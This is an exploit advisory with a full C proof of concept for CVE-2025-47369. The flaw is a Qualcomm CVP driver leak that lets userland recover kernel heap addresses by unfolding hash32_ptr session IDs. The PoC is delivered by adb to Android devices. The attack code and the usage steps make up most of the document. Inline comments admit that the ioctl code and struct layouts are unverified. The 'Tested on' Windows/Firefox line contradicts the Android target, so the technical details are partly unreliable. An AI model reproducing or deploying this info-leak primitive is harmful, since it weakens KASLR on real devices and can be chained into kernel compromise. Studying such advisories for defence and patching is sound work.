

 

 

Qualcomm CVP Kernel Pointer Leak

=============================================================================================================================================
| # Title : Qualcomm CVP Kernel Pointer Leak |

=============================================================================================================================================
| # Title : Kernel Pointer Leak via CVP Driver |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) -- as listed by the author; note that the PoC below is a native Linux binary pushed over adb and run on an ARM64 Android device (it opens /dev/cvp), so the host OS and browser are irrelevant to reproduction |
| # Vendor : https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213733/ & CVE-2025-47369

[+] Summary : The Qualcomm CVP driver exposes kernel pointers to userland by returning a "hashed" session ID derived from a kernel pointer using hash32_ptr().
This function is not a cryptographic hash but a reversible fold: on a 64-bit kernel it XORs the upper 32 bits of the pointer into the lower 32 bits and returns that 32-bit result.
Because the ARM64 kernel virtual address layout is predictable (the upper 32 bits of such an address are almost entirely fixed) and the pointed-to object is allocated with an alignment that zeroes its low bits, the fold can be deterministically "unfolded": the low nibble of the session ID is the low nibble of the upper word, the upper word can be reconstructed from it, and XORing that word back out of the session ID yields the original kernel pointer.
This design flaw results in a reliable kernel pointer leak that weakens KASLR: the recovered value is the address of a kernel heap object (the per-session structure), which exposes kernel data layout and provides an info-leak primitive that can be chained with a memory-corruption bug. Whether it also yields the kernel image base depends on the relationship between that heap object and the kernel text, which the PoC does not establish.
The issue is tracked as CVE-2025-47369 and stems from using a pointer-derived value as a userland-visible identifier (a design flaw) rather than from a memory-safety implementation bug.

[+] Affected Chipsets : AR8035, AR9380, CSR8811, FastConnect 6200, FastConnect 6700, FastConnect 6900, FastConnect 7800, Immersive Home 214 Platform,
Immersive Home 216 Platform, Immersive Home 316 Platform, Immersive Home 318 Platform, IPQ4018, IPQ4019, IPQ4028, IPQ4029, IPQ5010,
IPQ5028, IPQ6000, IPQ6010, IPQ6018, IPQ6028, IPQ8064, IPQ8065, IPQ8068, IPQ8070, IPQ8070A, IPQ8071, IPQ8071A, IPQ8072, IPQ8072A,
IPQ8074, IPQ8074A, IPQ8076, IPQ8076A, IPQ8078, IPQ8078A, IPQ8173, IPQ8174, QAM8255P, QAM8295P, QAM8620P, QAM8650P, QAM8775P, QAMSRV1H,
QAMSRV1M, QCA4024, QCA6174A, QCA6428, QCA6438, QCA6574, QCA6574A, QCA6574AU, QCA6584AU, QCA6595, QCA6595AU, QCA6678AQ, QCA6688AQ,
QCA6696, QCA6698AQ, QCA6797AQ, QCA7500, QCA8075, QCA8081, QCA8337, QCA9880, QCA9886, QCA9888, QCA9889, QCA9898, QCA9980, QCA9984,
QCA9985, QCA9986, QCA9990, QCA9992, QCA9994, QCC710, QCM5430, QCM6490, QCN5022, QCN5024, QCN5052, QCN5122, QCN5124, QCN5152, QCN5154,
QCN5164, QCN6023, QCN6024, QCN6112, QCN6122, QCN6132, QCN6224, QCN6274, QCN9000, QCN9022, QCN9024, QCN9070, QCN9072, QCN9074, QCN9100,
QCN9274, QCS5430, QCS615, QCS6490, QCS9100, QEP8111, QFW7114, QFW7124, QMP1000, Qualcomm® Video Collaboration VC3 Platform, SA6145P,
SA6150P, SA6155P, SA7255P, SA7775P, SA8145P, SA8150P, SA8155P, SA8195P, SA8255P, SA8295P, SA8540P, SA8620P, SA8650P, SA8770P, SA8775P,
SA9000P, SC8380XP, SDX55, SM4635, SM6475, SM6650, SM6650P, SM7435, SM7635, SM7635P, SM7675, SM7675P, SM8635, SM8635P, SM8650Q, SM8735,
SM8750, SM8750P, Snapdragon 4 Gen 2 Mobile Platform, Snapdragon 6 Gen 1 Mobile Platform, Snapdragon 8 Gen 3 Mobile Platform, Snapdragon
AR1 Gen 1 Platform, Snapdragon AR1 Gen 1 Platform "Luna1", Snapdragon Auto 5G Modem-RF Gen 2, Snapdragon X32 5G Modem-RF System,
Snapdragon X35 5G Modem-RF System, Snapdragon X72 5G Modem-RF System, Snapdragon X75 5G Modem-RF System, SRV1H, SRV1L, SRV1M, SXR2330P,
SXR2350P, WCD9340, WCD9370, WCD9375, WCD9378, WCD9380, WCD9385, WCD9390, WCD9395,
WCN3950, WCN3988, WCN6650, WCN6755, WCN7750, WCN7860, WCN7861, WCN7880, WCN7881,
WSA8810, WSA8815, WSA8830, WSA8832, WSA8835, WSA8840, WSA8845, WSA8845H
[+] Usage :

# 1. Compile the POC : gcc -o cvp_exploit cvp_exploit.c -static (build it with an aarch64 cross compiler such as aarch64-linux-gnu-gcc or the Android NDK clang, targeting the device; a binary produced by the host's native x86 gcc will not execute on the ARM64 device it is pushed to in step 2)

# 2. Upload the file to the machine : adb push cvp_exploit /data/local/tmp/

# 3. Run the exploit (the adb shell uid needs read/write access to /dev/cvp; on production builds the device node permissions or SELinux policy usually deny this, in which case the PoC stops at open() with "Failed to open /dev/cvp") :

adb shell
cd /data/local/tmp
chmod +x cvp_exploit
./cvp_exploit

[+] POC :

#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <stdint.h>

/* Values written into struct eva_kmd_arg.type, plus the session_ctrl sub-command.
 * NOTE(review): these numbers and the struct layouts below are what this PoC
 * uses; they are not verified here against the CVP/EVA UAPI header - confirm
 * them on the target kernel before trusting a failure or a success. */
#define EVA_KMD_SESSION_CONTROL 1
#define EVA_KMD_GET_SESSION_INFO 2
#define SESSION_CREATE 1 /* ctrl_type for session_ctrl_data: allocate a session */

/*
 * Payload of an EVA_KMD_SESSION_CONTROL request.
 * Only ctrl_type is modelled; the PoC sets it to SESSION_CREATE.
 * NOTE(review): the real driver structure may carry further fields - confirm
 * the layout against the CVP/EVA UAPI header.
 */
struct session_ctrl_data {
int ctrl_type; /* sub-command, SESSION_CREATE here */

};

/*
 * Payload of an EVA_KMD_GET_SESSION_INFO request.
 * session_id is filled in by the driver; per the advisory it is
 * hash32_ptr() of a kernel pointer, i.e. the value unfold_pointer() inverts.
 */
struct session_info_data {
unsigned int session_id; /* 32-bit folded kernel pointer returned by the driver */

};

/*
 * Argument block handed to the CVP driver's ioctl.
 * type selects which member of the union is meaningful
 * (EVA_KMD_SESSION_CONTROL -> session_ctrl, EVA_KMD_GET_SESSION_INFO -> session).
 * NOTE(review): this is the PoC's minimal model of the driver's argument
 * structure; field order, sizes and any additional fields must match the
 * driver's UAPI definition or the ioctl will read/write the wrong bytes.
 */
struct eva_kmd_arg {
int type; /* one of the EVA_KMD_* request types */
union {
struct session_ctrl_data session_ctrl; /* input for SESSION_CONTROL */
struct session_info_data session; /* output of GET_SESSION_INFO */

} data;
};

/*
 * Invert hash32_ptr() for a session ID returned by the CVP driver.
 *
 * hash32_ptr() on a 64-bit kernel yields (u32)(ptr ^ (ptr >> 32)): the low
 * word of the pointer XORed with its high word.  Recovery relies on two
 * assumptions that are hard-coded here:
 *   - the high word of the pointer is 0xffffff8X, i.e. only its low nibble
 *     is unknown (presumably the ARM64 kernel range observed on the target -
 *     confirm for the kernel under test);
 *   - the pointed-to object is at least 16-byte aligned, so the low nibble
 *     of the pointer is zero and the low nibble of the session ID is exactly
 *     the low nibble of the high word.
 * If either assumption fails the returned value is garbage, and nothing in
 * this file detects that: is_valid_kernel_pointer() accepts any value with
 * bit 63 set, which every output of this function has.
 *
 * session_id: 32-bit value from EVA_KMD_GET_SESSION_INFO.
 * Returns the reconstructed 64-bit kernel virtual address.
 */
unsigned long unfold_pointer(unsigned int session_id) {
    /* High word: fixed 0xffffff8_ prefix plus the nibble exposed by alignment. */
    unsigned long hi = 0xffffff80UL | (session_id & 0xfUL);
    /* XOR the high word back out of the fold to recover the low word. */
    unsigned long lo = (unsigned long)session_id ^ hi;
    return (hi << 32) | lo;
}

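/*
 * Sanity-check that a recovered value looks like an ARM64 kernel address.
 *
 * Accepts ptr when either
 *   - bit 63 is set (any address in the kernel half of the VA space), or
 *   - its top 24 bits are 0xffffff, the prefix unfold_pointer() produces.
 * The original second test compared (ptr >> 48) with 0xffffff, which can
 * never be true (a 16-bit quantity against a 24-bit constant); the shift is
 * 40 here so the comparison is live.  Because the first test already accepts
 * every output of unfold_pointer(), this function cannot detect a wrong
 * unfold; it only screens out obviously non-kernel values such as user-space
 * addresses or zero.
 *
 * ptr: candidate kernel virtual address.
 * Returns 1 for a plausible kernel pointer, 0 otherwise.
 */
int is_valid_kernel_pointer(unsigned long ptr) {
    if ((ptr >> 63) == 1) {
        return 1;
    }
    /* ptr >> 40 leaves exactly 24 bits to compare against 0xffffff. */
    if ((ptr >> 40) == 0xffffff) {
        return 1;
    }
    return 0;
}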

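/*
 * PoC entry point.
 *
 * Opens /dev/cvp, creates NUM_SESSIONS sessions through the driver's ioctl
 * interface, reads back each session_id and runs it through unfold_pointer()
 * to recover the kernel address the id was derived from.  It then prints the
 * difference between consecutive recovered addresses: a constant stride is
 * the practical sign that the ids really are folded addresses of per-session
 * objects from the same allocator, which is what makes the leak usable.
 *
 * Fixes over the original: session labels in the pattern analysis are now
 * 1-based like the creation messages (they were off by one); sizeof results
 * are printed with %zu; the pointer delta is kept unsigned and only cast for
 * the signed display.
 *
 * argc/argv are unused.  Returns EXIT_SUCCESS when open() and every ioctl
 * succeeded, EXIT_FAILURE otherwise; the device is closed on every path.
 * Sessions are never torn down explicitly - the PoC relies on whatever the
 * driver does when the fd is closed (TODO confirm against the driver).
 */
int main(int argc, char *argv[]) {
    /*
     * Request code passed to ioctl(2).  The original PoC passes a literal 0.
     * Linux drivers normally expect their own _IO*() command code and reject
     * anything else with ENOTTY/EINVAL, so this is the first thing to verify
     * against the CVP/EVA UAPI header if "Failed to create session" appears.
     */
    enum { CVP_IOCTL_REQUEST = 0, NUM_SESSIONS = 3 };
    unsigned long pointers[NUM_SESSIONS] = {0};

    (void)argc;
    (void)argv;

    printf("CVE-2025-47369 POC - Kernel Pointer Leak via CVP Driver by indoushka\n");
    printf("=====================================================================\n");

    int fd = open("/dev/cvp", O_RDWR);
    if (fd == -1) {
        perror("Failed to open /dev/cvp");
        printf("Make sure device exists and permissions are correct\n");
        return EXIT_FAILURE;
    }
    printf("[+] Opened /dev/cvp (fd=%d)\n", fd);

    for (int i = 0; i < NUM_SESSIONS; i++) {
        /* Step 1: ask the driver to allocate a new session object. */
        struct eva_kmd_arg create_arg = {
            .type = EVA_KMD_SESSION_CONTROL,
            .data.session_ctrl.ctrl_type = SESSION_CREATE,
        };
        if (ioctl(fd, CVP_IOCTL_REQUEST, &create_arg) < 0) {
            perror("Failed to create session");
            close(fd);
            return EXIT_FAILURE;
        }

        /* Step 2: read back the id the driver derived from that object's address. */
        struct eva_kmd_arg info_arg = {
            .type = EVA_KMD_GET_SESSION_INFO,
            .data.session.session_id = 0
        };
        if (ioctl(fd, CVP_IOCTL_REQUEST, &info_arg) < 0) {
            perror("Failed to get session info");
            close(fd);
            return EXIT_FAILURE;
        }

        unsigned int session_id = info_arg.data.session.session_id;
        printf("[+] Session %d created - session_id: 0x%08x\n", i + 1, session_id);

        unsigned long kernel_ptr = unfold_pointer(session_id);
        pointers[i] = kernel_ptr;

        if (is_valid_kernel_pointer(kernel_ptr)) {
            printf(" [+] Leaked kernel pointer: 0x%016lx\n", kernel_ptr);
            printf(" [+] Pointer analysis:\n");
            printf(" - Upper 32 bits: 0x%08lx\n", kernel_ptr >> 32);
            printf(" - Lower 32 bits: 0x%08lx\n", kernel_ptr & 0xffffffff);
            /*
             * Re-folding the recovered pointer reproduces session_id by
             * construction of unfold_pointer(), so this line is a display of
             * the PoC's own arithmetic, not independent evidence that the
             * pointer is correct.  The stride check below is the real signal.
             */
            unsigned int refold =
                (unsigned int)((kernel_ptr >> 32) ^ (kernel_ptr & 0xffffffff));
            printf(" - XOR result: 0x%08x\n", refold);
        } else {
            printf(" [-] Invalid/unexpected pointer format: 0x%016lx\n", kernel_ptr);
        }
        printf("\n");
    }

    printf("[+] Pattern Analysis:\n");
    for (int i = 1; i < NUM_SESSIONS; i++) {
        /* Unsigned difference; cast only for the signed byte count so a
         * downward stride shows as negative. */
        unsigned long delta = pointers[i] - pointers[i - 1];
        printf(" Difference between session %d and %d: %ld bytes (0x%lx)\n",
               i + 1, i, (long)delta, delta);
    }

    printf("\n[+] System Information:\n");
    /* sizeof yields size_t, so %zu is the matching conversion. */
    printf(" Pointer size: %zu bits\n", sizeof(void *) * 8);
    printf(" Long size: %zu bits\n", sizeof(unsigned long) * 8);

    close(fd);
    printf("[+] Exploit completed successfully\n");
    return EXIT_SUCCESS;
}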

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
